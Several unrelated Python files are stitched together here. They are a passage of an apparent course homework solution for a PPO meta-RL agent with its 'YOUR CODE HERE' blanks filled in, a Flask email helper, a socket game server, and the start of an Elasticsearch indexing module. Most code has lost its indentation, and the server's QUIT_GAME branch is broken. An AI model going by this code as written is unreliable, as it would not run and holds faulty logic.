sy_hidden: (batch_size, self.gru_size)
returns:
the parameters of the policy.
the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (batch_size, self.ac_dim)
"""
# ac_dim * 2 because we predict both mean and std
sy_policy_params, sy_hidden = build_policy(sy_ob_no, sy_hidden, self.ac_dim*2, self.scope, n_layers=self.n_layers, size=self.size, gru_size=self.gru_size, recurrent=self.recurrent)
return (sy_policy_params, sy_hidden)
def sample_action(self, policy_parameters):
"""
constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
(mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (batch_size, self.ac_dim)
returns:
sy_sampled_ac:
(batch_size, self.ac_dim)
"""
sy_mean, sy_logstd = policy_parameters
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean), 0, 1)
return sy_sampled_ac
def get_log_prob(self, policy_parameters, sy_ac_na):
"""
constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
(mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (batch_size, self.ac_dim)
sy_ac_na: (batch_size, self.ac_dim)
returns:
sy_lp_n: (batch_size)
"""
sy_mean, sy_logstd = policy_parameters
sy_lp_n = tfp.distributions.MultivariateNormalDiag(
loc=sy_mean, scale_diag=tf.exp(sy_logstd)).log_prob(sy_ac_na)
return sy_lp_n
def build_computation_graph(self):
"""
notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch size /n/, observation dim)
_na - this tensor should have shape (batch size /n/, action dim)
_n - this tensor should have shape (batch size /n/)
Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_lp_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n, self.sy_hidden, self.sy_lp_n, self.sy_fixed_lp_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
policy_outputs = self.policy_forward_pass(self.sy_ob_no, self.sy_hidden)
self.policy_parameters = policy_outputs[:-1]
# unpack mean and variance
self.policy_parameters = tf.split(self.policy_parameters[0], 2, axis=1)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_lp_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
# PPO critic update
critic_regularizer = tf.contrib.layers.l2_regularizer(1e-3) if self.l2reg else None
self.critic_prediction = tf.squeeze(build_critic(self.sy_ob_no, self.sy_hidden, 1, 'critic_network', n_layers=self.n_layers, size=self.size, gru_size=self.gru_size, recurrent=self.recurrent, regularizer=critic_regularizer))
self.sy_target_n = tf.placeholder(shape=[None], name="critic_target", dtype=tf.float32)
self.critic_loss = tf.losses.mean_squared_error(self.sy_target_n, self.critic_prediction)
self.critic_weights = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='critic_network')
self.critic_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.critic_loss)
# PPO actor update
self.sy_fixed_log_prob_n = tf.placeholder(shape=[None], name="fixed_log_prob", dtype=tf.float32)
self.policy_surr_loss = self.ppo_loss(self.sy_lp_n, self.sy_fixed_lp_n, self.sy_adv_n)
self.policy_weights = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.scope)
optimizer = tf.train.AdamOptimizer(self.learning_rate)
self.policy_update_op = minimize_and_clip(optimizer, self.policy_surr_loss, var_list=self.policy_weights, clip_val=40)
def sample_trajectories(self, itr, env, min_timesteps, is_evaluation=False):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
stats = []
while True:
animate_this_episode=(len(stats)==0 and (itr % 10 == 0) and self.animate)
steps, s = self.sample_trajectory(env, animate_this_episode, is_evaluation=is_evaluation)
stats += s
timesteps_this_batch += steps
if timesteps_this_batch > min_timesteps:
break
return stats, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode, is_evaluation):
"""
sample a task, then sample trajectories from that task until either
max(self.history, self.max_path_length) timesteps have been sampled
construct meta-observations by concatenating (s, a, r, d) into one vector
inputs to the policy should have the shape (batch_size, self.history, self.meta_ob_dim)
zero pad the input to maintain a consistent input shape
add the entire input as observation to the replay buffer, along with a, r, d
samples will be drawn from the replay buffer to update the policy
arguments:
env: the env to sample trajectories from
animate_this_episode: if True then render
is_evaluation: whether this is evaluation (True) or training (False)
"""
env.reset_task(is_evaluation=is_evaluation)
stats = []
#====================================================================================#
# ----------PROBLEM 1----------
#====================================================================================#
ep_steps = 0
steps = 0
num_samples = max(self.history, self.max_path_length + 1)
meta_obs = np.zeros((num_samples + self.history + 1, self.meta_ob_dim))
rewards = []
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
if ep_steps == 0:
ob = env.reset()
# first meta ob has only the observation
# set a, r, d to zero, construct first meta observation in meta_obs
# YOUR CODE HERE
ac = np.zeros((self.ac_dim))
r = np.zeros((self.reward_dim))
d = np.zeros((self.terminal_dim))
meta_obs[self.history + steps] = np.concatenate((ob, ac, r, d), axis=0)
#meta_obs[self.history + steps + 1] = np.concatenate((ob, ac, r, d), axis=0)
steps += 1
# index into the meta_obs array to get the window that ends with the current timestep
# please name the windowed observation `in_` for compatibility with the code that adds to the replay buffer (lines 418, 420)
# YOUR CODE HERE
in_ = meta_obs[steps : steps + self.history]
hidden = np.zeros((1, self.gru_size), dtype=np.float32)
# get action from the policy
# YOUR CODE HERE
ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no: np.array([in_]), self.sy_hidden: hidden})[0] #self.sy_ob_no: [in_]
# step the environment
# YOUR CODE HERE
ob, rew, done, _ = env.step(ac)
ep_steps += 1
done = bool(done) or ep_steps == self.max_path_length
# construct the meta-observation and add it to meta_obs
# YOUR CODE HERE
meta_obs[self.history + steps] = np.concatenate((ob, ac, [rew], [int(done)]), axis=0)
#meta_obs[self.history + steps + 1] = np.concatenate((ob, ac, [rew], [int(done)]), axis=0)
rewards.append(rew)
steps += 1
# add sample to replay buffer
if is_evaluation:
self.val_replay_buffer.add_sample(in_, ac, rew, done, hidden, env._goal)
else:
self.replay_buffer.add_sample(in_, ac, rew, done, hidden, env._goal)
# start new episode
if done:
# compute stats over trajectory
s = dict()
s['rewards']= rewards[-ep_steps:]
s['ep_len'] = ep_steps
stats.append(s)
ep_steps = 0
if steps >= num_samples:
break
return steps, stats
def compute_advantage(self, ob_no, re_n, hidden, masks, tau=0.95):
"""
computes generalized advantage estimation (GAE).
arguments:
ob_no: (bsize, history, ob_dim)
rewards: (bsize,)
masks: (bsize,)
values: (bsize,)
gamma: scalar
tau: scalar
output:
advantages: (bsize,)
returns: (bsize,)
requires:
self.gamma
"""
bsize = len(re_n)
rewards = np.squeeze(re_n)
masks = np.squeeze(masks)
values = self.sess.run(self.critic_prediction, feed_dict={self.sy_ob_no: ob_no, self.sy_hidden: hidden})[:,None]
gamma = self.gamma
assert rewards.shape == masks.shape == (bsize,)
assert values.shape == (bsize, 1)
bsize = len(rewards)
returns = np.empty((bsize,))
deltas = np.empty((bsize,))
advantages = np.empty((bsize,))
prev_return = 0
prev_value = 0
prev_advantage = 0
for i in reversed(range(bsize)):
returns[i] = rewards[i] + gamma * prev_return * masks[i]
deltas[i] = rewards[i] + gamma * prev_value * masks[i] - values[i]
advantages[i] = deltas[i] + gamma * tau * prev_advantage * masks[i]
prev_return = returns[i]
prev_value = values[i]
prev_advantage = advantages[i]
advantages = (advantages - np.mean(advantages, axis=0)) / np.std(advantages, axis=0)
return advantages, returns
def estimate_return(self, ob_no, re_n, hidden, masks):
"""
estimates the returns over a set of trajectories.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, history, meta_obs_dim)
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
hidden: hidden state of recurrent policy
masks: terminals masks
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
adv_n, q_n = self.compute_advantage(ob_no, re_n, hidden, masks)
return q_n, adv_n
def update_parameters(self, ob_no, hidden, ac_na, fixed_log_probs, q_n, adv_n):
"""
update the parameters of the policy and the critic,
with PPO update
arguments:
ob_no: (minibsize, history, meta_obs_dim)
hidden: shape: (minibsize, self.gru_size)
ac_na: (minibsize)
fixed_log_probs: (minibsize)
adv_n: shape: (minibsize)
q_n: shape: (sum_of_path_lengths)
returns:
nothing
"""
self.update_critic(ob_no, hidden, q_n)
self.update_policy(ob_no, hidden, ac_na, fixed_log_probs, adv_n)
def update_critic(self, ob_no, hidden, q_n):
"""
given:
self.num_value_iters
self.l2_reg
arguments:
ob_no: (minibsize, history, meta_obs_dim)
hidden: (minibsize, self.gru_size)
q_n: (minibsize)
requires:
self.num_value_iters
"""
target_n = (q_n - np.mean(q_n))/(np.std(q_n)+1e-8)
for k in range(self.num_value_iters):
critic_loss, _ = self.sess.run(
[self.critic_loss, self.critic_update_op],
feed_dict={self.sy_target_n: target_n, self.sy_ob_no: ob_no, self.sy_hidden: hidden})
return critic_loss
def update_policy(self, ob_no, hidden, ac_na, fixed_log_probs, advantages):
'''
arguments:
fixed_log_probs: (minibsize)
advantages: (minibsize)
hidden: (minibsize, self.gru_size)
'''
policy_surr_loss, _ = self.sess.run(
[self.policy_surr_loss, self.policy_update_op],
feed_dict={self.sy_ob_no: ob_no, self.sy_hidden: hidden, self.sy_ac_na: ac_na, self.sy_fixed_lp_n: fixed_log_probs, self.sy_adv_n: advantages})
return policy_surr_loss
def ppo_loss(self, log_probs, fixed_log_probs, advantages, clip_epsilon=0.1, entropy_coeff=1e-4):
"""
given:
clip_epsilon
arguments:
advantages (mini_bsize,)
states (mini_bsize,)
actions (mini_bsize,)
fixed_log_probs (mini_bsize,)
intermediate results:
states, actions --> log_probs
log_probs, fixed_log_probs --> ratio
advantages, ratio --> surr1
ratio, clip_epsilon, advantages --> surr2
surr1, surr2 --> policy_surr_loss
"""
ratio = tf.exp(log_probs - fixed_log_probs)
surr1 = ratio * advantages
surr2 = tf.clip_by_value(ratio, clip_value_min=1.0-clip_epsilon, clip_value_max=1.0+clip_epsilon) * advantages
policy_surr_loss = -tf.reduce_mean(tf.minimum(surr1, surr2))
probs = tf.exp(log_probs)
entropy = tf.reduce_sum(-(log_probs * probs))
policy_surr_loss -= entropy_coeff * entropy
return policy_surr_loss
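# Illustrative NumPy sketch (separate from the TF graph above): the clipped surrogate
# keeps the probability ratio inside [1 - eps, 1 + eps], so a single very likely action
# cannot dominate the update. The ratios and advantages below are arbitrary.
def _demo_ppo_clipping(eps=0.1):
    ratio = np.array([0.5, 1.0, 2.0])        # pi_new / pi_old
    adv = np.array([1.0, 1.0, 1.0])
    surr1 = ratio * adv
    surr2 = np.clip(ratio, 1.0 - eps, 1.0 + eps) * adv
    loss = -np.mean(np.minimum(surr1, surr2))
    # the out-of-range ratios 0.5 and 2.0 only contribute 0.5 and 1.1 to the objective
    assert np.isclose(loss, -(0.5 + 1.0 + 1.1) / 3)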
def train_PG(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
mini_batch_size,
max_path_length,
learning_rate,
num_ppo_updates,
num_value_iters,
animate,
logdir,
normalize_advantages,
nn_critic,
seed,
n_layers,
size,
gru_size,
history,
num_tasks,
l2reg,
recurrent,
granularity,
):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
envs = {'pm': PointEnv,
'pm-obs': ObservedPointEnv,
}
env = envs[env_name](granularity, num_tasks)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length
# Observation and action sizes
ob_dim = env.observation_space.shape[0] #+4
ac_dim = env.action_space.shape[0]
task_dim = len(env._goal) # rude, sorry
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'task_dim': task_dim,
'size': size,
'gru_size': gru_size,
'learning_rate': learning_rate,
'history': history,
'num_value_iters': num_value_iters,
'l2reg': l2reg,
'recurrent': recurrent,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_return_args = {
'gamma': gamma,
'nn_critic': nn_critic,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args)
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
def unpack_sample(data):
'''
unpack a sample from the replay buffer
'''
ob = data["observations"]
ac = data["actions"]
re = data["rewards"]
hi = data["hiddens"]
ma = 1 - data["terminals"]
return ob, ac, re, hi, ma
# construct PPO replay buffer, perhaps rude to do outside the agent
ppo_buffer = PPOReplayBuffer(agent.replay_buffer)
total_timesteps = 0
for itr in range(n_iter):
# for PPO: flush the replay buffer!
ppo_buffer.flush()
# sample trajectories to fill agent's replay buffer
print("********** Iteration %i ************"%itr)
stats = []
for _ in range(num_tasks):
s, timesteps_this_batch = agent.sample_trajectories(itr, env, min_timesteps_per_batch)
total_timesteps += timesteps_this_batch
stats += s
# compute the log probs, advantages, and returns for all data in agent's buffer
# store in ppo buffer for use in multiple ppo updates
# TODO: should move inside the agent probably
data = agent.replay_buffer.all_batch()
ob_no, ac_na, re_n, hidden, masks = unpack_sample(data)
fixed_log_probs = agent.sess.run(agent.sy_lp_n,
feed_dict={agent.sy_ob_no: ob_no, agent.sy_hidden: hidden, agent.sy_ac_na: ac_na})
q_n, adv_n = agent.estimate_return(ob_no, re_n, hidden, masks)
ppo_buffer.add_samples(fixed_log_probs, adv_n, q_n)
# update with mini-batches sampled from ppo buffer
for _ in range(num_ppo_updates):
data = ppo_buffer.random_batch(mini_batch_size)
ob_no, ac_na, re_n, hidden, masks = unpack_sample(data)
fixed_log_probs = data["log_probs"]
adv_n = data["advantages"]
q_n = data["returns"]
log_probs = agent.sess.run(agent.sy_lp_n,
feed_dict={agent.sy_ob_no: ob_no, agent.sy_hidden: hidden, agent.sy_ac_na: ac_na})
agent.update_parameters(ob_no, hidden, ac_na, fixed_log_probs, q_n, adv_n)
# compute validation statistics
print('Validating...')
val_stats = []
for _ in range(num_tasks):
vs, timesteps_this_batch = agent.sample_trajectories(itr, env, min_timesteps_per_batch // 10, is_evaluation=True)
val_stats += vs
# save trajectories for viz
with open("output/{}-epoch{}.pkl".format(exp_name, itr), 'wb') as f:
pickle.dump(agent.val_replay_buffer.all_batch(), f, pickle.HIGHEST_PROTOCOL)
agent.val_replay_buffer.flush()
# Log TRAIN diagnostics
returns = [sum(s["rewards"]) for s in stats]
final_rewards = [s["rewards"][-1] for s in stats]
ep_lengths = [s['ep_len'] for s in stats]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("FinalReward", np.mean(final_rewards))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
# Log VAL diagnostics
val_returns = [sum(s["rewards"]) for s in val_stats]
val_final_rewards = [s["rewards"][-1] for s in val_stats]
logz.log_tabular("ValAverageReturn", np.mean(val_returns))
logz.log_tabular("ValFinalReward", np.mean(val_final_rewards))
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='exp')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=0.99)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-pb', type=int, default=10000)
parser.add_argument('--mini_batch_size', '-mpb', type=int, default=64)
parser.add_argument('--num_tasks', '-nt', type=int, default=1)
parser.add_argument('--ep_len', '-ep', type=int, default=20)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-4)
parser.add_argument('--num_value_iters', '-nvu', type=int, default=1)
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_critic', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=1)
parser.add_argument('--size', '-s', type=int, default=64)
parser.add_argument('--gru_size', '-rs', type=int, default=32)
parser.add_argument('--history', '-ho', type=int, default=1)
parser.add_argument('--l2reg', '-reg', action='store_true')
parser.add_argument('--recurrent', '-rec', action='store_true')
parser.add_argument('--granularity', '-g', type=float, default=10) # number of square subdivisions over one plane axis
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size // args.num_tasks,
mini_batch_size=args.mini_batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
num_ppo_updates=(args.batch_size // args.mini_batch_size) * 5,
num_value_iters=args.num_value_iters,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_critic=args.nn_critic,
seed=seed,
n_layers=args.n_layers,
size=args.size,
gru_size=args.gru_size,
history=args.history,
num_tasks=args.num_tasks,
l2reg=args.l2reg,
recurrent=args.recurrent,
granularity=args.granularity,
)
print("args granularity ", args.granularity)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(
"[{prefix}] {subject}".format(prefix=app.config["MAIL_SUBJECT_PREFIX"], subject=subject),
sender=app.config["MAIL_SENDER"],
recipients=[to],
)
msg.body = render_template(template + ".txt", **kwargs)
msg.html = render_template(template + ".html", **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
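# Illustrative sketch only: how a view function might call send_email(). The route,
# the current_user helpers and the "auth/email/confirm" template name are assumptions;
# only send_email()'s signature and its background-thread behaviour come from the code above.
#
#   @auth.route('/confirm')
#   def resend_confirmation():
#       token = current_user.generate_confirmation_token()
#       send_email(current_user.email, 'Confirm Your Account',
#                  'auth/email/confirm', user=current_user, token=token)
#       return redirect(url_for('main.index'))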
|
server.py
|
import socket
import threading
from random import randint
from map_generation.spread_players import spread_across_the_map
from server_utils.player import Player
FORMAT = 'utf-8'
HEADER = 200
def print_color(text):
print("\u001b[36m" + text + "\u001b[0m")
class Server:
def __init__(self, terrain_map):
"""
:param terrain_map: A 2D list of integer values representing tile types on the map.
"""
self.map_to_send = terrain_map
self.players = []
self.queue = []
self.connections = dict()
self.threads = []
self.colours = ['BUBBLE_GUM', 'CHERRY', 'PURPLE', 'CORAL']
self.civilizations = ["The Great Northern", "Kaediredameria", "Mixtec", "Kintsugi"]
self.current_player = 0 # index in self.players that indicates who is active
self.rank = 0 # for now
self.started = False
self.finish = False
self.sock = None
self.ip = None
self.port = None
self.create_socket()
def create_socket(self):
"""
Initializes the server's socket.
"""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.settimeout(1)
self.sock.bind(('', 0))
host = socket.gethostname()
self.ip = socket.gethostbyname(host)
self.port = self.sock.getsockname()[1]
def header_generator(self, str_response):
"""
Generates a proper header for a message.
:param str_response: a message for which the header will be generated
:return: the header containing the message length
"""
resp_len = str(len(str_response)).encode(FORMAT)
resp_len += b' ' * (HEADER - len(resp_len))
return resp_len
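# Illustrative sketch (never called by the server): every message on the wire is
# preceded by a fixed-width, space-padded header carrying the body length, so the
# peer knows exactly how many bytes to recv() next.
def _demo_framing(self):
    body = "SHOW_MAP".encode(FORMAT)
    header = self.header_generator(body)
    assert len(header) == HEADER                  # always exactly HEADER bytes
    assert int(header.decode(FORMAT)) == len(body)
    # a client would then do: sock.send(header); sock.send(body)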
def parse_request(self, incoming_msg, conn):
"""
Used to generate a response/broadcast reacting to a client's message. A response is only sent to the original
caller, whereas a broadcast is sent to every client that's currently connected.
:param incoming_msg: the message that's being responded to
:param conn: the connection with the client whose call is being responded to
:return: a tuple of response (a list of messages that will be sent to the original caller) and broadcast (a list of
messages that will be sent to everybody)
"""
request = incoming_msg.split(":")
response = []
broadcast = []
if request[0] == "ADD_NEW_PLAYER":
if len(self.colours) != 0:
idx = randint(0, len(self.colours) - 1)
col = self.colours[idx]
self.colours.remove(col)
new_player = Player(request[1], col)
self.players.append(new_player)
self.connections[conn] = new_player
response.append(f"{request[1]}:YOU HAVE BEEN SUCCESSFULLY ADDED TO THE GAME".encode(FORMAT))
# broadcast = f"NEW PLAYER".encode(FORMAT)
elif request[0] == "CHOOSE_CIVILISATION":
if len(self.civilizations) != 0:
for player in self.players:
if player.player_name == request[1]:
# idx = self.civilizations.index(request[1])
self.civilizations.remove(request[2])
player.set_civilisation_type(request[2])
broadcast = f"NEW_PLAYER:{player.player_name}:{player.civilisation_type}:{player.player_colour}"
broadcast = [broadcast.encode(FORMAT)]
response.append(f"{request[1]} CHOSEN TYPE: {request[2]}".encode(FORMAT))
elif request[0] == "DISCONNECT":
broadcast = [incoming_msg.encode(FORMAT)]
player = self.connections[conn]
player.rank = self.rank
self.rank -= 1
ind = self.queue.index(player)
self.queue.pop(ind)
if ind == self.current_player:
ind = ind % len(self.queue)
next_player = self.queue[ind]
broadcast.extend(next_player.message_queue)
broadcast.append(f"TURN:{next_player.player_name}".encode(FORMAT))
next_player.message_queue.clear()
elif ind < self.current_player:
self.current_player = (self.current_player - 1) % len(self.queue)
self.connections.pop(conn)
elif request[0] == "DEFEAT":
broadcast = [incoming_msg.encode(FORMAT)]
ind = None
for i, player in enumerate(self.queue):
if player.player_name == request[1]:
player.rank = self.rank
self.rank -= 1
ind = i
break
if ind is not None:
self.queue.pop(ind)
if ind == self.current_player:
ind = ind % len(self.queue)
next_player = self.queue[ind]
broadcast.extend(next_player.message_queue)
broadcast.append(f"TURN:{next_player.player_name}".encode(FORMAT))
next_player.message_queue.clear()
elif ind < self.current_player:
self.current_player = (self.current_player - 1) % len(self.queue)
elif request[0] == "LIST_PLAYERS":
player_list = []
for player in self.players:
player_string = player.player_name
player_string += ':'
player_string += player.civilisation_type
player_string += ':'
player_string += player.player_colour
player_list.append(player_string)
response.append(str(player_list).encode(FORMAT))
elif request[0] == "LIST_CIVILIZATIONS":
civilizations_in_string = str(self.civilizations)
response.append(f"{civilizations_in_string}".encode(FORMAT))
elif request[0] == "SHOW_MAP":
map_in_string = str(self.map_to_send)
response.append(f"{map_in_string}".encode(FORMAT))
elif request[0] == "END_TURN":
response.append(incoming_msg.encode(FORMAT))
self.current_player += 1
self.current_player %= len(self.queue)
next_player = self.queue[self.current_player]
broadcast = [*next_player.message_queue, f"TURN:{next_player.player_name}".encode(FORMAT)]
next_player.message_queue.clear()
elif request[0] == "START_GAME":
self.started = True
self.queue = self.players.copy()
self.rank = len(self.players)
response.append(f"{request[1]}: YOU HAVE STARTED THE GAME".encode(FORMAT))
start_coords = spread_across_the_map(self.map_to_send, len(self.queue))
for i, (y, x) in enumerate(start_coords):
broadcast.append(f"ADD_UNIT:{self.queue[i].player_name}:{(x, y)}:Settler:1".encode(FORMAT))
broadcast.append(f"TURN:{self.queue[0].player_name}".encode(FORMAT))
elif request[0] == "EXIT_LOBBY":
broadcast = [f"FINISH:::".encode(FORMAT)]
elif request[0] == "QUIT_GAME":
wanted = next((player for player in self.players if player.player_name == request[1]), None)
self.players.remove(wanted)
idx = self.players.index(wanted)
self.connections[idx].close()
self.connections.pop(idx)
self.threads[idx].join()
self.threads.pop(idx)
elif request[0] == "END_GAME":
for player in self.players:
player.rank = player.rank - len(self.queue) + 1 if player.rank else 1
broadcast.append("GAME_ENDED".encode(FORMAT))
broadcast.extend(str(f"RANK:{player.player_name}:{player.rank}").encode(FORMAT) for player in self.players)
broadcast.append(incoming_msg.encode(FORMAT))
self.finish = True
elif request[0] == "ADD_UNIT" or request[0] == "MOVE_UNIT" or request[0] == "HEALTH":
broadcast = [incoming_msg.encode(FORMAT)]
elif request[0] == "ADD_CITY":
wanted = next((player for player in self.players if player.player_name == request[1]), None)
wanted.city_list.append(request[3])
broadcast = [incoming_msg.encode(FORMAT)]
elif request[0] == "MORE_AREA":
broadcast = [incoming_msg.encode(FORMAT)]
elif request[0] == "GIVE_CITY":
broadcast = [incoming_msg.encode(FORMAT)]
elif request[0].startswith("DIPLOMACY"):
wanted = next((player for player in self.players if player.player_name == request[3]), None)
if wanted is not None:
wanted.message_queue.append(incoming_msg.encode(FORMAT))
elif request[0] == "LIST_PLAYERS":
response_list = []
for player in self.players:
response_list.extend([player.player_name])
response_list_to_str = str(response_list)
response.append(response_list_to_str.encode(FORMAT))
else:
response.append(f"UNKNOWN OPTION".encode(FORMAT))
return response, broadcast
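# Example wire messages handled above (player/civilisation names are placeholders;
# the verbs and field order come straight from the branches in parse_request):
#   "ADD_NEW_PLAYER:Alice"              -> response confirming the player was added
#   "CHOOSE_CIVILISATION:Alice:Mixtec"  -> broadcast "NEW_PLAYER:Alice:Mixtec:<colour>"
#   "START_GAME:Alice"                  -> broadcast starting units and the first "TURN:..."
#   "END_TURN:Alice"                    -> broadcast the next player's queued messages and "TURN:..."
#   "DISCONNECT:Alice" / "DEFEAT:Alice" -> the player leaves the turn queue and gets a rank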
def connection_handler(self, conn, addr):
"""
Oversees client-server communication. Is being run in its separate thread for each client.
:param conn: socket object used to send and receive data to the client
:param addr: client's address
"""
connected = True
while connected and not self.finish:
try:
msg_len = conn.recv(HEADER).decode(FORMAT)
except socket.timeout:
continue
if msg_len:
msg_len = int(msg_len)
incoming_message = conn.recv(msg_len).decode(FORMAT)
print_color(f"RECEIVED NEW MESSAGE: {incoming_message} from {addr}")
if incoming_message.split(":")[0] == 'DISCONNECT':
connected = False
response, broadcast = self.parse_request(incoming_message, conn)
if len(response) != 0:
response_length = self.header_generator(response[0])
conn.send(response_length)
conn.send(response[0])
while broadcast:
mes = broadcast.pop(0)
for c in self.connections:
length = self.header_generator(mes)
c.send(length)
c.send(mes)
def start_connection(self):
"""
Accepts a new client connection and creates a thread for handling it.
"""
try:
self.sock.listen()
print_color(f"IM HERE: {self.ip} {self.port}")
while not self.started and not self.finish:
try:
conn, addr = self.sock.accept()
except socket.timeout:
continue
self.connections[conn] = None
conn.settimeout(1)
print_color(f"NEW CONNECTION FROM {addr} ")
new_thread = threading.Thread(target=self.connection_handler, args=(conn, addr))
self.threads.append(new_thread)
new_thread.start()
print_color(f"N_O ACTIVE CONNECTIONS: {threading.activeCount() - 2}")
for thread in self.threads:
thread.join()
except KeyboardInterrupt:
for thread in self.threads:
thread.join()
print_color("SERVER PROCESS TERMINATED")
# for testing
if __name__ == "__main__":
server = Server([1, 2])
|
es.py
|
"""
Setup (once only)
$ python app/es.py
Docker network
$ sudo docker network create twint-wikilink
$ sudo docker network connect twint-wikilink <wikilink-app-container-id>
$ sudo docker network connect twint-wikilink <twint-es-container-id>
$ ping -c 2 twintdevcontainer_es_1 -p 9200
Elasticsdump
$ multielasticdump --direction=dump --match='^.*$' --fsCompress --input=http://es:9200 --output=esdump_2020****
$ multielasticdump --direction=load --match='^.*$' --fsCompress --output=http://es:9200 --input=esdump_2020****
"""
from __future__ import annotations
import asyncio
import base64
import bz2
import collections
from concurrent.futures import process
import datetime
import glob
import gzip
import html
import json
import os
import pickle
import re
import threading
import queue
from typing import Iterable, List, Tuple, Optional
import elasticsearch
import mwparserfromhell
from elasticsearch_dsl import connections, Document, Date, Keyword, Q, Search, Text, Range, Integer, Float, UpdateByQuery
from qwikidata.entity import WikidataItem
from qwikidata.json_dump import WikidataJsonDump
# import wikitextparser as wtp
PAGE_ALIAS = "wiki-page"
PAGE_PATTERN = f"{PAGE_ALIAS}-*"
REDIRECT_ALIAS = "wiki-redirect"
REDIRECT_PATTERN = f"{REDIRECT_ALIAS}-*"
WKD_ALIAS = "wiki-data"
WKD_PATTERN = f"{WKD_ALIAS}-*"
# TICKER_ALIAS = "yahoo-ticker"
